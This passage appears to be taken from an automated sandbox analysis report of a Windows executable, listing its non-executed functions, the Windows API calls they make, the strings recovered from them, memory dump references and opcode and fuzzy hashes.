                                                                                  • API ID: Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
                                                                                  • String ID:
                                                                                  • API String ID: 73155330-0
                                                                                  • Opcode ID: c49bc023de0e2a92928f53e7c16b56888227e9b94bcb6080ad38a6f5ea522257
                                                                                  • Instruction ID: fb86670eddeee0066a8b5a45d76c2ecc6fabe2d8b6493c971719652171461ce1
                                                                                  • Opcode Fuzzy Hash: c49bc023de0e2a92928f53e7c16b56888227e9b94bcb6080ad38a6f5ea522257
                                                                                  • Instruction Fuzzy Hash: 47814923A1A78245E6118B7998401B9A794FF96BC4F14C335EF9967793EF3CE092C700

                                                                                  Non-executed Functions

                                                                                  Function 0000000140001A30 Relevance: 37.9, APIs: 30, Instructions: 422memorystringCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2359077787.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                  • Associated: 00000003.00000002.2359063412.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359136200.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359152941.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359208093.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_140000000_9afrYB.jbxd
                                                                                  Similarity
                                                                                  • API ID: CriticalSection$EnterLeave$Heap$AllocProcesslstrlen
                                                                                  • String ID:
                                                                                  • API String ID: 3526400053-0
                                                                                  • Opcode ID: 2d7440e75e10ea9e081ba84afc5c3468ce3eac85d6796ce4805a157c9b29c232
                                                                                  • Instruction ID: dcb8fc7c666fd7128fde866f0540a8def7dae1288ec2bbf322971b46f3f62141
                                                                                  • Opcode Fuzzy Hash: 2d7440e75e10ea9e081ba84afc5c3468ce3eac85d6796ce4805a157c9b29c232
                                                                                  • Instruction Fuzzy Hash: E3220F76211B4086E722DF26F840B9933A1F78CBE5F541226EB5A8B7B4DF3AC585C740
                                                                                  Function 0000000140003F80 Relevance: 36.9, APIs: 18, Strings: 3, Instructions: 160timeCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2359077787.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                  • Associated: 00000003.00000002.2359063412.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359136200.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359152941.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359208093.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_140000000_9afrYB.jbxd
                                                                                  Similarity
                                                                                  • API ID: CriticalSectionServer$CreateErrorLastProcessTimerTokenWaitable$AdjustCloseContextCurrentDontEnterEventHandleInitializeLeaveListenLookupOpenPrivilegePrivilegesProtseqRegisterSerializeValueVersion
                                                                                  • String ID: SeLoadDriverPrivilege$ampStartSingletone: logging started, settins=%s$null
                                                                                  • API String ID: 3408796845-4213300970
                                                                                  • Opcode ID: 126decfa78297cd7188aa212e183f7007b74f13d5c024852e8adcc4be0567069
                                                                                  • Instruction ID: 59d58333609de1a5812b0fd1fbb73637b4596d8d749a2627428b03e5fdfefd81
                                                                                  • Opcode Fuzzy Hash: 126decfa78297cd7188aa212e183f7007b74f13d5c024852e8adcc4be0567069
                                                                                  • Instruction Fuzzy Hash: B19104B1224A4182EB12CF22F854BC633A5F78C7D4F445229FB9A4B6B4DF7AC159CB44
                                                                                  Function 00000001400042B0 Relevance: 31.6, APIs: 17, Strings: 1, Instructions: 59synchronizationtimethreadCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2359077787.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                  • Associated: 00000003.00000002.2359063412.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359136200.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359152941.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359208093.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_140000000_9afrYB.jbxd
                                                                                  Similarity
                                                                                  • API ID: CriticalSection$CloseHandle$DeleteEnterLeaveServer$CancelEventListeningMgmtObjectSingleStopTerminateThreadTimerUnregisterWaitWaitable
                                                                                  • String ID: ampStopSingletone: logging ended
                                                                                  • API String ID: 2048888615-3533855269
                                                                                  • Opcode ID: 304760f1fd88bc3c97c02eb8ad6caf2cea0e78157ea711a11ae6bb1ec958ebce
                                                                                  • Instruction ID: 72436faa0f880f3f140bbf81e9e476d17cd4b789f208762ad84a5967a0be411a
                                                                                  • Opcode Fuzzy Hash: 304760f1fd88bc3c97c02eb8ad6caf2cea0e78157ea711a11ae6bb1ec958ebce
                                                                                  • Instruction Fuzzy Hash: 85315178221A0192EB17DF27EC94BD82361E79CBE1F455111FB0A4B2B1CF7AC5898744
                                                                                  Function 000000014000C3F0 Relevance: 29.0, APIs: 19, Instructions: 515COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2359077787.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                  • Associated: 00000003.00000002.2359063412.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359136200.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359152941.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359208093.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_140000000_9afrYB.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 3eee3a1980859deabbe81d62853d66f73e7f8938a0b91b292409d40ad6238f27
                                                                                  • Instruction ID: 939e1951021ac32239a98278383650b1560c4a87fea8e277fdca239b4ddbef52
                                                                                  • Opcode Fuzzy Hash: 3eee3a1980859deabbe81d62853d66f73e7f8938a0b91b292409d40ad6238f27
                                                                                  • Instruction Fuzzy Hash: 3022CEB2625A8086EB22CF2BF445BEA77A0F78DBC4F444116FB4A476B5DB39C445CB00
                                                                                  Function 0000000140001520 Relevance: 22.8, APIs: 10, Strings: 3, Instructions: 95COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2359077787.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                  • Associated: 00000003.00000002.2359063412.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359136200.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359152941.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359208093.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_140000000_9afrYB.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorLastManagerOpen$FileModuleName
                                                                                  • String ID: /remove$/service$vseamps
                                                                                  • API String ID: 67513587-3839141145
                                                                                  • Opcode ID: 39fa17c263662ab8de8707f1fae5283c28ed51da3e4186f1b0bc27974e33e859
                                                                                  • Instruction ID: ba5f49d8dd96f1c36e401cc1f7cdff7269c229e2e129f463089a9495e32f08e5
                                                                                  • Opcode Fuzzy Hash: 39fa17c263662ab8de8707f1fae5283c28ed51da3e4186f1b0bc27974e33e859
                                                                                  • Instruction Fuzzy Hash: F031E9B2708B4086EB42DF67B84439AA3A1F78CBD4F480025FF5947B7AEE79C5558704
                                                                                  Function 000000014000F000 Relevance: 21.2, APIs: 6, Strings: 6, Instructions: 152libraryloaderCOMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • LoadLibraryA.KERNEL32(?,?,?,?,?,?,000000FF,00000000,00000001,00000001400094C9,?,?,?,00000000,00000001,000000014000961C), ref: 000000014000F042
                                                                                  • GetProcAddress.KERNEL32(?,?,?,?,?,?,000000FF,00000000,00000001,00000001400094C9,?,?,?,00000000,00000001,000000014000961C), ref: 000000014000F05E
                                                                                  • GetProcAddress.KERNEL32(?,?,?,?,?,?,000000FF,00000000,00000001,00000001400094C9,?,?,?,00000000,00000001,000000014000961C), ref: 000000014000F086
                                                                                  • GetProcAddress.KERNEL32(?,?,?,?,?,?,000000FF,00000000,00000001,00000001400094C9,?,?,?,00000000,00000001,000000014000961C), ref: 000000014000F0A5
                                                                                  • GetProcAddress.KERNEL32 ref: 000000014000F0F3
                                                                                  • GetProcAddress.KERNEL32 ref: 000000014000F117
                                                                                    • Part of subcall function 00000001400073E0: LdrLoadDll.NTDLL ref: 00000001400073E2
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2359077787.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                  • Associated: 00000003.00000002.2359063412.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359136200.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359152941.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359208093.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_140000000_9afrYB.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressProc$Load$Library
                                                                                  • String ID: GetActiveWindow$GetLastActivePopup$GetProcessWindowStation$GetUserObjectInformationA$MessageBoxA$USER32.DLL
                                                                                  • API String ID: 3981747205-232180764
                                                                                  • Opcode ID: a4a8166f7fb3539f2a033069c8db60d0a751c3badd5dc7e485aee673dfe3cd32
                                                                                  • Instruction ID: 2f5902004a3f6de811dc5f380475ae1a3efdd32c0186a6d00da0f9ae6c345c7d
                                                                                  • Opcode Fuzzy Hash: a4a8166f7fb3539f2a033069c8db60d0a751c3badd5dc7e485aee673dfe3cd32
                                                                                  • Instruction Fuzzy Hash: FE515CB561674181FE66EB63B850BFA2290BB8D7D0F484025BF4E4BBB1EF3DC445A210
                                                                                  Function 00000001400022C0 Relevance: 15.1, APIs: 10, Instructions: 96threadCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2359077787.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                  • Associated: 00000003.00000002.2359063412.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359136200.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359152941.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359208093.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_140000000_9afrYB.jbxd
                                                                                  Similarity
                                                                                  • API ID: CreateEvent$Thread$ClientCriticalCurrentImpersonateInitializeOpenRevertSectionSelfToken
                                                                                  • String ID:
                                                                                  • API String ID: 4284112124-0
                                                                                  • Opcode ID: edd1c8558eeb60cdd671b70c13388f4905a0e10de3bd345b1359afa696ffe28d
                                                                                  • Instruction ID: d1cc2c0b88e239984ef66edc10b99dba483783d79de04edfe0f0364e5ac1fb7c
                                                                                  • Opcode Fuzzy Hash: edd1c8558eeb60cdd671b70c13388f4905a0e10de3bd345b1359afa696ffe28d
                                                                                  • Instruction Fuzzy Hash: 65415D72604B408AE351CF66F88479EB7A0F78CB94F508129EB8A47B74CF79D595CB40
                                                                                  Function 0000000140001430 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 52serviceCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2359077787.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                  • Associated: 00000003.00000002.2359063412.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359136200.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359152941.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359208093.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_140000000_9afrYB.jbxd
                                                                                  Similarity
                                                                                  • API ID: Service$CloseHandle$CreateErrorFileLastManagerModuleNameOpen
                                                                                  • String ID: vseamps
                                                                                  • API String ID: 3693165506-3944098904
                                                                                  • Opcode ID: 37866f258d51cd6cd84815c45d3eaefe281d6d9a8e40d6c1e65e6d09f5d7cdba
                                                                                  • Instruction ID: 61898eac7960aa5413d410c65d13376abce5a62f28ec8a6c68938921ced9de71
                                                                                  • Opcode Fuzzy Hash: 37866f258d51cd6cd84815c45d3eaefe281d6d9a8e40d6c1e65e6d09f5d7cdba
                                                                                  • Instruction Fuzzy Hash: F321FCB1204B8086EB56CF66F88439A73A4F78C784F544129E7894B774DF7DC149CB00
                                                                                  Function 0000000140009300 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 154COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetModuleFileNameA.KERNEL32(?,?,?,00000000,00000001,000000014000961C,?,?,?,?,?,?,0000000140009131,?,?,00000001), ref: 00000001400093CF
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2359077787.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                  • Associated: 00000003.00000002.2359063412.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359136200.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359152941.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359208093.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_140000000_9afrYB.jbxd
                                                                                  Similarity
                                                                                  • API ID: FileModuleName
                                                                                  • String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
                                                                                  • API String ID: 514040917-4022980321
                                                                                  • Opcode ID: 1d01bebd6d090e025827d9f03818fc87fa6a91df27b235dcc59e95ab31d19661
                                                                                  • Instruction ID: eb4045a5a240d2828a775daba1198261b01968dd91f8e387fbd6cb4ec0284cf4
                                                                                  • Opcode Fuzzy Hash: 1d01bebd6d090e025827d9f03818fc87fa6a91df27b235dcc59e95ab31d19661
                                                                                  • Instruction Fuzzy Hash: F851EFB131464042FB26DB2BB851BEA2391A78D7E0F484225BF2947AF2DF39C642C304
                                                                                  Function 000000014000BB70 Relevance: 12.3, APIs: 8, Instructions: 256COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2359077787.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                  • Associated: 00000003.00000002.2359063412.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359136200.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359152941.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359208093.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_140000000_9afrYB.jbxd
                                                                                  Similarity
                                                                                  • API ID: String$ByteCharMultiWide$AllocErrorHeapLast
                                                                                  • String ID:
                                                                                  • API String ID: 2057259594-0
                                                                                  • Opcode ID: d3ef643e943a21760fc28678b116a7f08da1d9f04a09311d9013e3bfd6c4d4e3
                                                                                  • Instruction ID: f9b9a5bb90e2e08b647a9eb75fc4ff4e18af91537db3c322e1916602633d995e
                                                                                  • Opcode Fuzzy Hash: d3ef643e943a21760fc28678b116a7f08da1d9f04a09311d9013e3bfd6c4d4e3
                                                                                  • Instruction Fuzzy Hash: B6A16AB22046808AEB66DF27E8407EA77E5F74CBE8F144625FB6947BE4DB78C5408700
                                                                                  Function 0000000140005A70 Relevance: 12.2, APIs: 8, Instructions: 163memoryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2359077787.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                  • Associated: 00000003.00000002.2359063412.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359136200.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359152941.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359208093.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_140000000_9afrYB.jbxd
                                                                                  Similarity
                                                                                  • API ID: Heap$Process$Free$AllocInfoStartupVersion
                                                                                  • String ID:
                                                                                  • API String ID: 3103264659-0
                                                                                  • Opcode ID: b926c3abaa2c479ec326760b90e5a1fd11221ebaffc6337adf83b77cd4a46ae1
                                                                                  • Instruction ID: 8fdcf1cc106887877eb8bf0912cd84dfc65bead55acac366e092854278e1a3ce
                                                                                  • Opcode Fuzzy Hash: b926c3abaa2c479ec326760b90e5a1fd11221ebaffc6337adf83b77cd4a46ae1
                                                                                  • Instruction Fuzzy Hash: 0F7167B1604A418AF767EBA3B8557EA2291BB8D7C5F084039FB45472F2EF39C440C741
                                                                                  Function 00007FF8BFB82630 Relevance: 10.6, APIs: 7, Instructions: 71COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2359237188.00007FF8BFB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8BFB80000, based on PE: true
                                                                                  • Associated: 00000003.00000002.2359223150.00007FF8BFB80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359280231.00007FF8BFB92000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359295333.00007FF8BFB9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359308946.00007FF8BFB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_7ff8bfb80000_9afrYB.jbxd
                                                                                  Similarity
                                                                                  • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                  • String ID:
                                                                                  • API String ID: 3140674995-0
                                                                                  • Opcode ID: 710f6283529bc39a5878960356047a6e461f095b9b13c17159f2665477d47395
                                                                                  • Instruction ID: f9ff226e6ef0274ffe1f50a34b199562d7d6d6161a092e6f85501bf8a19ca1a7
                                                                                  • Opcode Fuzzy Hash: 710f6283529bc39a5878960356047a6e461f095b9b13c17159f2665477d47395
                                                                                  • Instruction Fuzzy Hash: EF316276A09B818AEB608FA4E8407ED7365FB84784F44803ADB4E47B95DF3CD548C710
                                                                                  Function 0000000140007C91 Relevance: 9.1, APIs: 6, Instructions: 137COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2359077787.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                  • Associated: 00000003.00000002.2359063412.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359136200.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359152941.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359208093.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_140000000_9afrYB.jbxd
                                                                                  Similarity
                                                                                  • API ID: ExceptionFilterProcessUnhandled$CaptureContextCurrentDebuggerPresentTerminate
                                                                                  • String ID:
                                                                                  • API String ID: 1269745586-0
                                                                                  • Opcode ID: 971e421c69f8e6a9c7be80a9fd1684b11f1d9217f6c56614116cebe2abaa4248
                                                                                  • Instruction ID: e2ab3ef72b7f240c54b21dbf897bf6525f512fe4427dd1c0d247b710ac710d4c
                                                                                  • Opcode Fuzzy Hash: 971e421c69f8e6a9c7be80a9fd1684b11f1d9217f6c56614116cebe2abaa4248
                                                                                  • Instruction Fuzzy Hash: 53115972608B8186D7129F62F8407CE77B0FB89B91F854122EB8A43765EF3DC845CB00
                                                                                  Function 00007FF8BFB876E0 Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2359237188.00007FF8BFB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8BFB80000, based on PE: true
                                                                                  • Associated: 00000003.00000002.2359223150.00007FF8BFB80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359280231.00007FF8BFB92000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359295333.00007FF8BFB9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359308946.00007FF8BFB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_7ff8bfb80000_9afrYB.jbxd
                                                                                  Similarity
                                                                                  • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                  • String ID:
                                                                                  • API String ID: 1239891234-0
                                                                                  • Opcode ID: 5eef0cc7783b0be87f0727cc0123e63361c6ac4350bb89c20972030a757485fe
                                                                                  • Instruction ID: 493c0610fd7291e4994ff8c5c59b1269afb3d5554708213d46e6fc39f4baa25a
                                                                                  • Opcode Fuzzy Hash: 5eef0cc7783b0be87f0727cc0123e63361c6ac4350bb89c20972030a757485fe
                                                                                  • Instruction Fuzzy Hash: 9C318036A18B8186DB60CF69E8403AE73A0FB89798F504536EB9D43B95DF3CD155CB10
                                                                                  Function 000000014000A370 Relevance: 7.5, APIs: 5, Instructions: 41timethreadCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2359077787.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                  • Associated: 00000003.00000002.2359063412.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359136200.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359152941.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359208093.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_140000000_9afrYB.jbxd
                                                                                  Similarity
                                                                                  • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                                                  • String ID:
                                                                                  • API String ID: 1445889803-0
                                                                                  • Opcode ID: 348833bf0fd47251ec8459b694c57c39dac6eb63685dc4ebaa15df7501b8973f
                                                                                  • Instruction ID: 72e860a1e5610cf2f60718b33953b9e9cfa3de8eae9ff42976e828aecb981d5d
                                                                                  • Opcode Fuzzy Hash: 348833bf0fd47251ec8459b694c57c39dac6eb63685dc4ebaa15df7501b8973f
                                                                                  • Instruction Fuzzy Hash: 4101F775255B4082EB928F26F9403957360F74EBA0F456220FFAE4B7B4DA3DCA958700
                                                                                  Function 0000000140004630 Relevance: 5.1, APIs: 4, Instructions: 80memoryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetProcessHeap.KERNEL32(?,?,?,00000001400047BB,?,?,?,0000000140003E7A,?,?,?,?,00000000,00000001400022A6), ref: 00000001400046B0
                                                                                  • HeapReAlloc.KERNEL32(?,?,?,00000001400047BB,?,?,?,0000000140003E7A,?,?,?,?,00000000,00000001400022A6), ref: 00000001400046C1
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2359077787.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                  • Associated: 00000003.00000002.2359063412.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359136200.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359152941.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359208093.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_140000000_9afrYB.jbxd
                                                                                  Similarity
                                                                                  • API ID: Heap$AllocProcess
                                                                                  • String ID:
                                                                                  • API String ID: 1617791916-0
                                                                                  • Opcode ID: e1b55434e6231e5ce6780f684ad3576ffb26ff33b9fae7a8d56a49fd816118fb
                                                                                  • Instruction ID: 02c5a1d02253778f48d8bcd65850d79aa5baad65f26a42f950a3123f4edab52d
                                                                                  • Opcode Fuzzy Hash: e1b55434e6231e5ce6780f684ad3576ffb26ff33b9fae7a8d56a49fd816118fb
                                                                                  • Instruction Fuzzy Hash: CB31D1B2715A8082EB06CF57F44039863A0F74DBC4F584025EF5D57B69EB39C8A28704
                                                                                  Function 00000001400106B0 Relevance: 4.5, APIs: 3, Instructions: 47COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2359077787.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                  • Associated: 00000003.00000002.2359063412.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359136200.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359152941.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359208093.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_140000000_9afrYB.jbxd
                                                                                  Similarity
                                                                                  • API ID: ExceptionFilterUnhandled$CaptureContext
                                                                                  • String ID:
                                                                                  • API String ID: 2202868296-0
                                                                                  • Opcode ID: 905f91afdcc57dbacad6504ae7f65679640b92e152865c9b61e81d303733290d
                                                                                  • Instruction ID: a6869a7b9d4117274e99734abe304e52ce4a6a571683f9898e15e7d65764808a
                                                                                  • Opcode Fuzzy Hash: 905f91afdcc57dbacad6504ae7f65679640b92e152865c9b61e81d303733290d
                                                                                  • Instruction Fuzzy Hash: 44014C31218A8482E7269B62F4543DA62A0FBCD385F440129B78E0B6F6DF3DC544CB01
                                                                                  Function 00007FF8BFB90248 Relevance: 3.2, APIs: 2, Instructions: 227COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2359237188.00007FF8BFB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8BFB80000, based on PE: true
